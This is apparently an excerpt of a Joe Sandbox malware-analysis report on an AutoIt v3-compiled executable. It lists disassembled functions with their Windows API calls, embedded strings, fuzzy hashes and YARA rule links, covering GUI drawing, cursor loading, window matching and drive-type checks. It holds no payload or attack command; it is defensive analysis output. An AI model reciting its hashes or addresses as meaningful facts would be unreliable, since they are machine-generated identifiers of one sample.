SCSI, xrefs: 0026B509
USB, xrefs: 0026B533

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 571e2aba31862492a537b181e9e36836ee50c7ca7e784090f0bf8fcf905270cf
Instruction ID: 6335b05a9e3793e522f81698b2d311348b5dc47aa62083d5040d9db771f137a9
Opcode Fuzzy Hash: 571e2aba31862492a537b181e9e36836ee50c7ca7e784090f0bf8fcf905270cf
Instruction Fuzzy Hash: 1E51AB31B70209DBCB12EF20C9929FDB7A0AB453807644026E407E7691DBF1AEF1DB55

Function 0028A041 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 0028A0F7
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0028A1B0
SendMessageW.USER32(?,00001102,00000002,?), ref: 0028A1CC

Strings

0, xrefs: 0028A209

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: a23f1295087a1f9d262728dd83f66bc0a290e591b493b632f4bdc1ae8c88d28f
Instruction ID: a019312efd2cab078e82e692d0e83eb06b3c40fbcc251d69ff846e641be31157
Opcode Fuzzy Hash: a23f1295087a1f9d262728dd83f66bc0a290e591b493b632f4bdc1ae8c88d28f
Instruction Fuzzy Hash: 1402E23412A302AFEB15DF18C888BAABBE4FF44314F04851EF995962E1CB75D964CF52

Function 0028AF18 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0028AF51
SetTextColor.GDI32(?,?), ref: 0028AF55
GetSysColorBrush.USER32(0000000F), ref: 0028AF6B
GetSysColor.USER32(0000000F), ref: 0028AF76
CreateSolidBrush.GDI32(?), ref: 0028AF7B
GetSysColor.USER32(00000011), ref: 0028AF93
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0028AFA1
SelectObject.GDI32(?,00000000), ref: 0028AFB2
SetBkColor.GDI32(?,00000000), ref: 0028AFBB
SelectObject.GDI32(?,?), ref: 0028AFC8
InflateRect.USER32(?,000000FF,000000FF), ref: 0028AFE7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0028AFFE
GetWindowLongW.USER32(00000000,000000F0), ref: 0028B013
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0028B05F
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0028B086
InflateRect.USER32(?,000000FD,000000FD), ref: 0028B0A4
DrawFocusRect.USER32(?,?), ref: 0028B0AF
GetSysColor.USER32(00000011), ref: 0028B0BD
SetTextColor.GDI32(?,00000000), ref: 0028B0C5
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0028B0D9
SelectObject.GDI32(?,0028AC1F), ref: 0028B0F0
DeleteObject.GDI32(?), ref: 0028B0FB
SelectObject.GDI32(?,?), ref: 0028B101
DeleteObject.GDI32(?), ref: 0028B106
SetTextColor.GDI32(?,?), ref: 0028B10C
SetBkColor.GDI32(?,?), ref: 0028B116

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 455e58005952244cf6658c7319a605441acff92a725c0bf362c5651781d90674
Instruction ID: 6e8390b00fc75222fbd3499cba6d4248995f8324bdbacb76acb976873ef1aeea
Opcode Fuzzy Hash: 455e58005952244cf6658c7319a605441acff92a725c0bf362c5651781d90674
Instruction Fuzzy Hash: 1D615E72911219BFDF11AFA4EC88AAE7B79FF08320F114116FA15AB2E1D7719950CF90

Function 00288FFA Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 002890EA
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002890FB
CharNextW.USER32(0000014E), ref: 0028912A
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0028916B
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00289181
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00289192
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 002891AF
SetWindowTextW.USER32(?,0000014E), ref: 002891FB
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00289211
SendMessageW.USER32(?,00001002,00000000,?), ref: 00289242
_memset.LIBCMT ref: 00289267
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 002892B0
_memset.LIBCMT ref: 0028930F
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00289339
SendMessageW.USER32(?,00001074,?,00000001), ref: 00289391
SendMessageW.USER32(?,0000133D,?,?), ref: 0028943E
InvalidateRect.USER32(?,00000000,00000001), ref: 00289460
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002894AA
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002894D7
DrawMenuBar.USER32(?), ref: 002894E6
SetWindowTextW.USER32(?,0000014E), ref: 0028950E

Strings

0, xrefs: 00289478

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 3b1879672f9af7fa10e8a0d35b95d0a1b62a371cc5418dbebb89b5b4c0e38979
Instruction ID: 9b8224d1f7499b5fcacd66fffc87e24de24746f4c3b438c39aeb81dc3868ee9d
Opcode Fuzzy Hash: 3b1879672f9af7fa10e8a0d35b95d0a1b62a371cc5418dbebb89b5b4c0e38979
Instruction Fuzzy Hash: 7FE1B078915219AFDF21AF90DC88EFE7BB8EF05710F088156F914AA1D1D7708AA1DF50

Function 00284ECC Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00285007
GetDesktopWindow.USER32 ref: 0028501C
GetWindowRect.USER32(00000000), ref: 00285023
GetWindowLongW.USER32(?,000000F0), ref: 00285085
DestroyWindow.USER32(?), ref: 002850B1
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 002850DA
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002850F8
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0028511E
SendMessageW.USER32(?,00000421,?,?), ref: 00285133
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00285146
IsWindowVisible.USER32(?), ref: 00285166
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00285181
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00285195
GetWindowRect.USER32(?,?), ref: 002851AD
MonitorFromPoint.USER32(?,?,00000002), ref: 002851D3
GetMonitorInfoW.USER32(00000000,?), ref: 002851ED
CopyRect.USER32(?,?), ref: 00285204
SendMessageW.USER32(?,00000412,00000000), ref: 0028526F

Strings

tooltips_class32, xrefs: 002850D3
(, xrefs: 002851E0
0, xrefs: 00284FB2

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 60bc19cc0d1e6956ddc9a830d491d03afab76b1d937178c7e3b0bf8b997f3e2a
Instruction ID: 993cca698fd50b0798398a87697e1c3fe88502ece138cebccba8124351129b05
Opcode Fuzzy Hash: 60bc19cc0d1e6956ddc9a830d491d03afab76b1d937178c7e3b0bf8b997f3e2a
Instruction Fuzzy Hash: 15B1AC71624711AFD704EF64D888B6BBBE4BF88300F00891DF9999B291DB70E814CF91

Function 0026498A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 0026499C
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 002649C2
_wcscpy.LIBCMT ref: 002649F0
_wcscmp.LIBCMT ref: 002649FB
_wcscat.LIBCMT ref: 00264A11
_wcsstr.LIBCMT ref: 00264A1C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00264A38
_wcscat.LIBCMT ref: 00264A81
_wcscat.LIBCMT ref: 00264A88
_wcsncpy.LIBCMT ref: 00264AB3

Strings

\VarFileInfo\Translation, xrefs: 00264A30
StringFileInfo\, xrefs: 00264A0B
%u.%u.%u.%u, xrefs: 00264B16
DefaultLangCodepage, xrefs: 00264A9B
04090000, xrefs: 00264A6E

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: f4168f94bc5c63958d336d24a4933ba7ed1ab25252672eda8234ef4eace81b77
Instruction ID: f771e05c4a17d0ae1b39c45f1d46be157b3b45673e63debe32c1818e42645efa
Opcode Fuzzy Hash: f4168f94bc5c63958d336d24a4933ba7ed1ab25252672eda8234ef4eace81b77
Instruction Fuzzy Hash: AF416B32920215BADB10BBB0ED43EFF776CEF45310F000056FD04A6182EB74DA719AA5

Function 00202BA9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00202C8C
GetSystemMetrics.USER32(00000007), ref: 00202C94
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00202CBF
GetSystemMetrics.USER32(00000008), ref: 00202CC7
GetSystemMetrics.USER32(00000004), ref: 00202CEC
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00202D09
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00202D19
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00202D4C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00202D60
GetClientRect.USER32(00000000,000000FF), ref: 00202D7E
GetStockObject.GDI32(00000011), ref: 00202D9A
SendMessageW.USER32(00000000,00000030,00000000), ref: 00202DA5

Part of subcall function 00202714: GetCursorPos.USER32(?), ref: 00202727
Part of subcall function 00202714: ScreenToClient.USER32(002C77B0,?), ref: 00202744
Part of subcall function 00202714: GetAsyncKeyState.USER32(00000001), ref: 00202769
Part of subcall function 00202714: GetAsyncKeyState.USER32(00000002), ref: 00202777

SetTimer.USER32(00000000,00000000,00000028,002013C7), ref: 00202DCC

Strings

h), xrefs: 00202BEC, 0023C433
AutoIt v3 GUI, xrefs: 00202D44

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI$h)
API String ID: 1458621304-484710859
Opcode ID: b038efe0102ff747796fca7451fa48a725a39ae0876732f8ce409d665b2983a8
Instruction ID: 8d05a99bbb305a0651eb2e10c30aee85cd28f41ea58ed09aba60bed52e4e2048
Opcode Fuzzy Hash: b038efe0102ff747796fca7451fa48a725a39ae0876732f8ce409d665b2983a8
Instruction Fuzzy Hash: 2CB15D71A1020ADFDB14DFA8DC99BAD7BB4FB08314F11422AFA15A72D0DB70A864DF50

Function 00220429 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349COMMON

Download Yara Rule

APIs

Part of subcall function 00211821: _memmove.LIBCMT ref: 0021185B

GetForegroundWindow.USER32(00290980,?,?,?,?,?), ref: 002204E3
IsWindow.USER32(?), ref: 002566BB

Strings

TITLE, xrefs: 00256650
HANDLE, xrefs: 0025649E
INSTANCE, xrefs: 002565FA
REGEXPTITLE, xrefs: 002564B4
REGEXPCLASS, xrefs: 00256506
CLASS, xrefs: 002564E5
ALL, xrefs: 00256622
ACTIVE, xrefs: 00256488
LAST, xrefs: 00256472

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Window$Foreground_memmove
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 3828923867-1919597938
Opcode ID: 58392ef8dfae75a51f2496d577bcff5e16c901649155e7b94556a74d54c3a673
Instruction ID: 89023676827ace366f7ddc8aa7d4c1760dc132da4b657e1c417b4c2e4ca0de66
Opcode Fuzzy Hash: 58392ef8dfae75a51f2496d577bcff5e16c901649155e7b94556a74d54c3a673
Instruction Fuzzy Hash: AED1A030124202EBCB04EF60D4859AAFBB9FF54345F904A19F855436A2DB30E9BDCF96

Function 0028441F Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 002844AC
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 0028456C

Strings

VIEWCHANGE, xrefs: 0028472B
DESELECT, xrefs: 0028465A
GETITEMCOUNT, xrefs: 002844DE
ISSELECTED, xrefs: 00284577
GETSELECTED, xrefs: 0028469A
SELECT, xrefs: 00284606
GETSELECTEDCOUNT, xrefs: 0028454F
GETTEXT, xrefs: 00284515
GETSUBITEMCOUNT, xrefs: 002844F7
SELECTALL, xrefs: 002845D3
FINDITEM, xrefs: 002846DF
SELECTCLEAR, xrefs: 002845EB
SELECTINVERT, xrefs: 0028463C

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 35c6c6ae278fa636c06da4493fa45a233a9b461ffa4162f6b1387b02c03f6b01
Instruction ID: b3c81765ab37942f089fd28ad35c7267b299267e71fb757fa5d8067ec658300c
Opcode Fuzzy Hash: 35c6c6ae278fa636c06da4493fa45a233a9b461ffa4162f6b1387b02c03f6b01
Instruction Fuzzy Hash: 8DA18E742353129FCB14FF60C891A6AB3A5EF89354F108928F8565B2E2DB30ED25CF51

Function 002756C8 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 002756E1
LoadCursorW.USER32(00000000,00007F8A), ref: 002756EC
LoadCursorW.USER32(00000000,00007F00), ref: 002756F7
LoadCursorW.USER32(00000000,00007F03), ref: 00275702
LoadCursorW.USER32(00000000,00007F8B), ref: 0027570D
LoadCursorW.USER32(00000000,00007F01), ref: 00275718
LoadCursorW.USER32(00000000,00007F81), ref: 00275723
LoadCursorW.USER32(00000000,00007F88), ref: 0027572E
LoadCursorW.USER32(00000000,00007F80), ref: 00275739
LoadCursorW.USER32(00000000,00007F86), ref: 00275744
LoadCursorW.USER32(00000000,00007F83), ref: 0027574F
LoadCursorW.USER32(00000000,00007F85), ref: 0027575A
LoadCursorW.USER32(00000000,00007F82), ref: 00275765
LoadCursorW.USER32(00000000,00007F84), ref: 00275770
LoadCursorW.USER32(00000000,00007F04), ref: 0027577B
LoadCursorW.USER32(00000000,00007F02), ref: 00275786
GetCursorInfo.USER32(?), ref: 00275796
GetLastError.KERNEL32(00000001,00000000), ref: 002757C1

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: c98744769475ab6537e53e6854b627fcf3d4b460160b5b6fc3d61f27691163bb
Instruction ID: 0dd663da236dca71a84b5bc6fef5a1ceec362d9d94e40f216918cc86292399dc
Opcode Fuzzy Hash: c98744769475ab6537e53e6854b627fcf3d4b460160b5b6fc3d61f27691163bb
Instruction Fuzzy Hash: 0E418470E04319ABDB109FBA8C49D6EFFF8EF51B10B10452FE509E7291DAB8A500CE51

Function 0025B13A Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0025B17B
__swprintf.LIBCMT ref: 0025B21C
_wcscmp.LIBCMT ref: 0025B22F
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0025B284
_wcscmp.LIBCMT ref: 0025B2C0
GetClassNameW.USER32(?,?,00000400), ref: 0025B2F7
GetDlgCtrlID.USER32(?), ref: 0025B349
GetWindowRect.USER32(?,?), ref: 0025B37F
GetParent.USER32(?), ref: 0025B39D
ScreenToClient.USER32(00000000), ref: 0025B3A4
GetClassNameW.USER32(?,?,00000100), ref: 0025B41E
_wcscmp.LIBCMT ref: 0025B432
GetWindowTextW.USER32(?,?,00000400), ref: 0025B458
_wcscmp.LIBCMT ref: 0025B46C

Part of subcall function 0022385C: _iswctype.LIBCMT ref: 00223864

Strings

%s%u, xrefs: 0025B216

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: bcc8fdc67a5cd1dca70861fbde716d5aad95e68d71525b57b4f5fe613221bc69
Instruction ID: 6faa12fec01449a21e3adf903e8b2ad03bca3be77f5235cd09643a7190b73e95
Opcode Fuzzy Hash: bcc8fdc67a5cd1dca70861fbde716d5aad95e68d71525b57b4f5fe613221bc69
Instruction Fuzzy Hash: BDA10171220207AFD726DF60C894BEAB7E8FF44352F00851AFD99D2191D730E969CB95

Function 0025BA6D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0025BAB1
_wcscmp.LIBCMT ref: 0025BAC2
GetWindowTextW.USER32(00000001,?,00000400), ref: 0025BAEA
CharUpperBuffW.USER32(?,00000000), ref: 0025BB07
_wcscmp.LIBCMT ref: 0025BB25
_wcsstr.LIBCMT ref: 0025BB36
GetClassNameW.USER32(00000018,?,00000400), ref: 0025BB6E
_wcscmp.LIBCMT ref: 0025BB7E
GetWindowTextW.USER32(00000002,?,00000400), ref: 0025BBA5
GetClassNameW.USER32(00000018,?,00000400), ref: 0025BBEE
_wcscmp.LIBCMT ref: 0025BBFE
GetClassNameW.USER32(00000010,?,00000400), ref: 0025BC26
GetWindowRect.USER32(00000004,?), ref: 0025BC8F

Strings

ThumbnailClass, xrefs: 0025BB79, 0025BBF9
@, xrefs: 0025BA92

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 13cce20e1706e136e9ab053380e072f08c20612f4e83991ffcc321790334abb9
Instruction ID: aba80aee50168ce502bc9c65376b3920119ae0959da4b51167b1b0e2386e77a9
Opcode Fuzzy Hash: 13cce20e1706e136e9ab053380e072f08c20612f4e83991ffcc321790334abb9
Instruction Fuzzy Hash: 3281067102430A9FDB02CF10C885FAAB7E8FF44316F04846AFD898A096DB74DD69CB65

Function 0025B8B6 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0025B915

Strings

[ALL, xrefs: 0025B9BB
[REGEXPTITLE:, xrefs: 0025B93D
[ACTIVE, xrefs: 0025B902
[LAST, xrefs: 0025B9C2
[CLASS:, xrefs: 0025B965
CLASSNAME=, xrefs: 0025B952
REGEXP=, xrefs: 0025B92A
HANDLE=, xrefs: 0025B90E
ALL, xrefs: 0025B9A9
ACTIVE, xrefs: 0025B8F0
LAST, xrefs: 0025B8DA
[HANDLE:, xrefs: 0025B921

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 2a7905587b4728297735e6c70dfa90e01145dcdbd541fc57796d4dc130b2d18e
